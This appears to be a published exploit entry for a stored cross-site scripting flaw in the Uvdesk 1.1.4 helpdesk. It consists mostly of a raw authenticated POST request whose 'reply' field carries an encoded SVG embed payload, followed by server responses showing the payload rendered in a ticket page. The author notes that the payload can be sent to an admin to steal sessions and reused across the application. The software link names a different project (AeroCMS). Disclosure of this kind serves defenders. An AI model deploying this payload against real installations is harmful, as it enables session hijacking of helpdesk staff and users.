# Exploit Title: Uvdesk 1.1.4 - Stored XSS (Authenticated) # Date: 14/08/2023 # Exploit Author: Hubert Wojciechowski # Contact Author: hub.woj12345@gmail.com # Vendor Homepage: https://www.uvdesk.com/ # Software Link: https://github.com/MegaTKC/AeroCMS # Version: 1.1.4 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 # Authenticated user privilages to tickets. User can send XSS to admin or other user and stolen sesssion. ## Example XSS Stored in new ticket ----------------------------------------------------------------------------------------------------------------------- Param: reply ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- POST /uvdesk/public/en/member/thread/add/1 HTTP/1.1 Host: 127.0.0.1 Content-Length: 812 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://127.0.0.1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXCjJcGbgZxZWLsSk User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://127.0.0.1/uvdesk/public/en/member/ticket/view/1 Accept-Encoding: gzip, deflate Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: uv-sidebar=0; PHPSESSID=4b0j3r934245lpssq5lil3edm3 Connection: close ------WebKitFormBoundaryXCjJcGbgZxZWLsSk Content-Disposition: form-data; name="threadType" forward ------WebKitFormBoundaryXCjJcGbgZxZWLsSk Content-Disposition: form-data; name="status" ------WebKitFormBoundaryXCjJcGbgZxZWLsSk Content-Disposition: form-data; name="subject" aaaa ------WebKitFormBoundaryXCjJcGbgZxZWLsSk Content-Disposition: form-data; name="to[]" test@local.host ------WebKitFormBoundaryXCjJcGbgZxZWLsSk Content-Disposition: form-data; name="reply" %3Cp%3E%3Cembed+src%3D%22data%3Aimage%2Fsvg%2Bxml%3Bbase64%2CPHN2ZyB4bWxuczpzdmc9Imh0dH+A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv+MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs+aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw+IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI%2BYWxlcnQoIlh+TUyIpOzwvc2NyaXB0Pjwvc3ZnPg%3D%3D%22+type%3D%22image%2Fsvg%2Bxml%22+width%3D%22300%22+height%3D%22150%22%3E%3C%2Fembed%3E%3C%2Fp%3E ------WebKitFormBoundaryXCjJcGbgZxZWLsSk Content-Disposition: form-data; name="pic"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryXCjJcGbgZxZWLsSk Content-Disposition: form-data; name="nextView" stay ------WebKitFormBoundaryXCjJcGbgZxZWLsSk-- ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 302 Found Date: Mon, 14 Aug 2023 11:33:26 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: PHP/7.4.29 Cache-Control: max-age=0, must-revalidate, private Location: /uvdesk/public/en/member/ticket/view/1 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET,POST,PUT,OPTIONS Access-Control-Allow-Headers: Access-Control-Allow-Origin Access-Control-Allow-Headers: Authorization Access-Control-Allow-Headers: Content-Type X-Debug-Token: bf1b73 X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/bf1b73 X-Robots-Tag: noindex Expires: Mon, 14 Aug 2023 11:33:26 GMT Set-Cookie: sf_redirect=%7B%22token%22%3A%22bf1b73%22%2C%22route%22%3A%22helpdesk_member_add_ticket_thread%22%2C%22method%22%3A%22POST%22%2C%22controller%22%3A%7B%22class%22%3A%22Webkul%5C%5CUVDesk%5C%5CCoreFrameworkBundle%5C%5CController%5C%5CThread%22%2C%22method%22%3A%22saveThread%22%2C%22file%22%3A%22C%3A%5C%5Cxampp2%5C%5Chtdocs%5C%5Cuvdesk%5C%5Cvendor%5C%5Cuvdesk%5C%5Ccore-framework%5C%5CController%5C%5CThread.php%22%2C%22line%22%3A44%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D; path=/; httponly; samesite=lax Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 398 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='/uvdesk/public/en/member/ticket/view/1'" /> <title>Redirecting to /uvdesk/public/en/member/ticket/view/1</title> </head> <body> Redirecting to <a href="/uvdesk/public/en/member/ticket/view/1">/uvdesk/public/en/member/ticket/view/1</a>. </body> </html> ----------------------------------------------------------------------------------------------------------------------- Redirect and view response: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Mon, 14 Aug 2023 11:44:14 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: PHP/7.4.29 Cache-Control: max-age=0, must-revalidate, private Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET,POST,PUT,OPTIONS Access-Control-Allow-Headers: Access-Control-Allow-Origin Access-Control-Allow-Headers: Authorization Access-Control-Allow-Headers: Content-Type X-Debug-Token: 254ce8 X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/254ce8 X-Robots-Tag: noindex Expires: Mon, 14 Aug 2023 11:44:14 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 300607 <!DOCTYPE html> <html> <head> <title>#1 vvvvvvvvvvvvvvvvvvvvv</title> [...] <p><embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" width="300" height="150"></embed></p> [...] ----------------------------------------------------------------------------------------------------------------------- XSS execute, we can reply ticket to victim. This payload can use in new articles, tickets, all application.